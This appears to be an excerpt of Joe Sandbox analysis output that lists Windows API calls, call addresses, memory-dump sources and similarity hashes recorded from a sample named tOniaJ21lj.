• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CloseEnumOpen
• String ID:
• API String ID: 1332880857-0
• Opcode ID: b395eec5d444746d883dbbe68a26dc186a8be4d3543415a8a9a06ae4829f6fc1
• Instruction ID: 4db75c3f0003ee77c81ad7234f2e5e1b513bc4eba3d2eee43a500da64a91fe5e
• Opcode Fuzzy Hash: b395eec5d444746d883dbbe68a26dc186a8be4d3543415a8a9a06ae4829f6fc1
• Instruction Fuzzy Hash: 4931B270F04649AFDB14DFA6DC52BAFBBB9EB48304F90407BE400F7281D6785A01CA29
APIs
• FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AF52
• FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B0AF,00000000,0040B0C7,?,?,?,00000000), ref: 0040AF63
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Resource$FindFree
• String ID:
• API String ID: 4097029671-0
• Opcode ID: 495ed283f31991be558d7aaf91bbf96f1b13b17f58e3dd61e94c2b353b9623af
• Instruction ID: d0e6d2b3de5701a5b01f0c314f0e154d100cb3f2f79c9d4e2e087994511e300e
• Opcode Fuzzy Hash: 495ed283f31991be558d7aaf91bbf96f1b13b17f58e3dd61e94c2b353b9623af
• Instruction Fuzzy Hash: 7701F7B1704300AFD700EF69DC92E1A77EDDB897187128076F500EB3D0DA799C119669
APIs
• GetCurrentThreadId.KERNEL32 ref: 0041EE63
• 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E908,?,00000001), ref: 0041EE69
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: A15940CurrentThread
• String ID:
• API String ID: 1959240892-0
• Opcode ID: b328251ae0892c8a3b7f185b32438ae157af80a37aa78e1151a8addd2e42d252
• Instruction ID: 6dec67758a4febc774e22da3091525d30ea0c4d8bfc57ce8b44416be19a69247
• Opcode Fuzzy Hash: b328251ae0892c8a3b7f185b32438ae157af80a37aa78e1151a8addd2e42d252
• Instruction Fuzzy Hash: C3015B74A04704AFD701CFA6EC11956BBE8E789720B22887BE904D37A0EA385811DE18
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: FreeVirtual
• String ID: d=d
• API String ID: 1263568516-2426951441
• Opcode ID: 09cabece21cf584f7b8116981dfbad3f8653d6c5a4f55eb454a10d9661d4edbc
• Instruction ID: dd39995c24d96b1f0cd65365fb3acc738aa13d81c460f04ccbda7f03c85f078f
• Opcode Fuzzy Hash: 09cabece21cf584f7b8116981dfbad3f8653d6c5a4f55eb454a10d9661d4edbc
• Instruction Fuzzy Hash: 6D01FC766442148FC3109F69DCC0E2677E8D794378F16453EDA85673A1D37A6C018BDC
APIs
• MoveFileA.KERNEL32(00000000,00000000), ref: 004518CA
• GetLastError.KERNEL32(00000000,00000000,00000000,004518F0), ref: 004518D2
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ErrorFileLastMove
• String ID:
• API String ID: 55378915-0
• Opcode ID: 10a17b5f55d8132d355b2be22579e48721c0d02d21db4419b0f25e12a06febb5
• Instruction ID: 4a908479c274ede1fa612a67027dcf523005e30280c6ec4e7261d6cc76548501
• Opcode Fuzzy Hash: 10a17b5f55d8132d355b2be22579e48721c0d02d21db4419b0f25e12a06febb5
• Instruction Fuzzy Hash: B9014971B00304AF9B10FFB99C4259EB7ECDB8832171045BBFC08E3652EA384E048558
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004513D7), ref: 004513B1
• GetLastError.KERNEL32(00000000,00000000,00000000,004513D7), ref: 004513B9
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 7fd9e911900e9a06a0dfd278701c74cc3c46c37c0458817335f085c5dd111093
• Instruction ID: 9b23b03b90933790c580962e112c838e42041695dbfb4577ddf6274ef4a18e8c
• Opcode Fuzzy Hash: 7fd9e911900e9a06a0dfd278701c74cc3c46c37c0458817335f085c5dd111093
• Instruction Fuzzy Hash: 2EF0C871A04708BBEB00EFB5AC516AEB7E8EB09315F5045B7FC04E3A52E6794E148698
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                      • String ID:
                                                                                      • API String ID: 2987862817-0
                                                                                      • Opcode ID: 0102d987cd0908c49357e23cdbf7a47517641d04aa5dfc05fc1f8898bd46d34f
                                                                                      • Instruction ID: 2bd629673230950b16c4bb4544665cc4d3578012b9e0763c9fae70ecea85f9d4
                                                                                      • Opcode Fuzzy Hash: 0102d987cd0908c49357e23cdbf7a47517641d04aa5dfc05fc1f8898bd46d34f
                                                                                      • Instruction Fuzzy Hash: 31F08270714744FEDF019F779C6282BBBECE74DB1479249B6F800A2691E63C5810C939
                                                                                      APIs
                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046C065,?,00000000), ref: 0045006A
                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046C065,?,00000000), ref: 00450072
                                                                                        • Part of subcall function 0044FE10: GetLastError.KERNEL32(0044FC2C,0044FED2,?,00000000,?,00492588,00000001,00000000,00000002,00000000,004926E9,?,?,00000005,00000000,0049271D), ref: 0044FE13
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 1156039329-0
                                                                                      • Opcode ID: f7b6d91780900016932261e5b31036d83abc2770e31421f62e2bd79437fa69ba
                                                                                      • Instruction ID: 619d70630f7d728e19568b0c26e44efacd411b086580920acadf97a9c9154113
                                                                                      • Opcode Fuzzy Hash: f7b6d91780900016932261e5b31036d83abc2770e31421f62e2bd79437fa69ba
                                                                                      • Instruction Fuzzy Hash: F9E012B53042016BEB10EAA5A9C1F3B23DCEF44715F10447EB944CF183D674CC054B69
                                                                                      APIs
                                                                                      • SendNotifyMessageA.USER32(00010474,00000496,00002711,00000000), ref: 0047912C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageNotifySend
                                                                                      • String ID:
                                                                                      • API String ID: 3556456075-0
                                                                                      • Opcode ID: 1bf78a2a4972fbb2a73e3495687c09ee27ad1c961f8a5cc689fdc3f33d66a45c
                                                                                      • Instruction ID: 7d22008d7a83e2500ddd5853d1c98629ae082a9ef6797e0e4edc72868eccde80
                                                                                      • Opcode Fuzzy Hash: 1bf78a2a4972fbb2a73e3495687c09ee27ad1c961f8a5cc689fdc3f33d66a45c
                                                                                      • Instruction Fuzzy Hash: 884142343240009BCB10FF26D88598A7BA5EB50309B65C5BBB8049F3A7CA3DDD46DB9D
                                                                                      APIs
                                                                                      • 76CCE550.OLE32(00494B14,00000000,00000001,00494B24,00497054), ref: 0046A2B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: E550
                                                                                      • String ID:
                                                                                      • API String ID: 734438002-0
                                                                                      • Opcode ID: 1a96fdbb3e90de8797b7c34e8fd7761ef28502cc93813c311678e4427fcc9a8f
                                                                                      • Instruction ID: 28ea0cda059d87ed8d6f055d3f11cf2141d1ab261bbca5563b99c48b31e217e3
                                                                                      • Opcode Fuzzy Hash: 1a96fdbb3e90de8797b7c34e8fd7761ef28502cc93813c311678e4427fcc9a8f
                                                                                      • Instruction Fuzzy Hash: 1731BC303686008FD750DB19D895B6A73E1EB95314F6082BBF8489B3A1E779EC41CB4E
                                                                                      APIs
                                                                                      • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FBA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoScroll
                                                                                      • String ID:
                                                                                      • API String ID: 629608716-0
                                                                                      • Opcode ID: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                                      • Instruction ID: 884c2cb002146e47c45dd1875db58eae66db6a4caaf859e9ca4b80fd75174b4c
                                                                                      • Opcode Fuzzy Hash: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                                      • Instruction Fuzzy Hash: DD2130716087456FC340DF39D840696BBE4BB48344F148A3EA098C3341D774E99ACBD6
                                                                                      APIs
                                                                                        • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                                        • Part of subcall function 0041EE14: 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E908,?,00000001), ref: 0041EE69
                                                                                      • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,004683C6,?,00000000,?,?,004685D3,?,00000000,00468612), ref: 004683AA
                                                                                        • Part of subcall function 0041EEC8: IsWindow.USER32(8BF0EBFF), ref: 0041EED6
                                                                                        • Part of subcall function 0041EEC8: EnableWindow.USER32(8BF0EBFF,00000001), ref: 0041EEE5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                                      • String ID:
                                                                                      • API String ID: 1039859321-0
                                                                                      • Opcode ID: 467ce9893c8a2b941d671877d34955771c88eccab2483bb784be52c54abd03e3
                                                                                      • Instruction ID: 1e6c9ee491f26ebb38a393fd70065da3d13cda2054ea28a361ce8fb2712a9f85
                                                                                      • Opcode Fuzzy Hash: 467ce9893c8a2b941d671877d34955771c88eccab2483bb784be52c54abd03e3
                                                                                      • Instruction Fuzzy Hash: F0F0E9B1258300BFE7159B72EC56B1677E8E314B15F51447FF804C66D0EA7A5890C62D
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                      • Instruction ID: f885d1546c0ddadd170268c7727831953bb7ef74118cb9c1630738a499be6481
                                                                                      • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                      • Instruction Fuzzy Hash: E3F06D70504109EFAF0CCF58D0658AF77A1EF48300B2084AFE60797790D638AE30E798
                                                                                      APIs
                                                                                      • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 004164F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID:
                                                                                      • API String ID: 716092398-0
                                                                                      • Opcode ID: cdcc0148ce654954751abbafc01dffb42bdee5d1888213000ee0bb92e9214fa3
                                                                                      • Instruction ID: a44329a4cc8b06b024a2b0eee2fd8d89e642962040674eee811c3e7967e458ca
                                                                                      • Opcode Fuzzy Hash: cdcc0148ce654954751abbafc01dffb42bdee5d1888213000ee0bb92e9214fa3
                                                                                      • Instruction Fuzzy Hash: F5F025B2200510AFDB84CF9CD9C0F9373ECEB0C210B0981A6FA08CF24AD220EC108BB0
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0041495F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                      • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                      • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                      • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,0042CBF0,?,00000001,?,?,00000000,?,0042CC42,00000000,0045162D,00000000,0045164E,?,00000000), ref: 0042CBD3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                                      • Instruction ID: dfed850972a7f4cfed0b3d6ce6ead54829112a593105f6481b619d55be1254e6
                                                                                      • Opcode Fuzzy Hash: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                                      • Instruction Fuzzy Hash: 1AE06571304708BFD701EB62AC93E5EBBACD745714B914876B400A7651D5B8AE00845C
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FF60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: a92cf0aa8bb23f57ccdc9442b6704fbd4576b7ac5b6e0326e42d432a692528ee
                                                                                      • Instruction ID: 45ed5e217c844315310d89a20c49d2eff003bfa8467b370b0955f01a950c20be
                                                                                      • Opcode Fuzzy Hash: a92cf0aa8bb23f57ccdc9442b6704fbd4576b7ac5b6e0326e42d432a692528ee
                                                                                      • Instruction Fuzzy Hash: 39E0EDA53541583ED240AABCBC52F9767DC9759754F008033B998D7241D4619A158BA8
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451E7B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
APIs
• CreateWindowExA.USER32(00000000,004235EC,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 00406329
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
APIs
• RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• FindClose.KERNEL32(00000000,000000FF,0046C888,00000000,0046D681,?,00000000,0046D6CA,?,00000000,0046D803,?,00000000,?,00000000), ref: 004536D2
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
• KiUserCallbackDispatcher.NTDLL(00490192,?,004901B4,?,?,00000000,00490192,?,?), ref: 0041460B
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406E8C
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
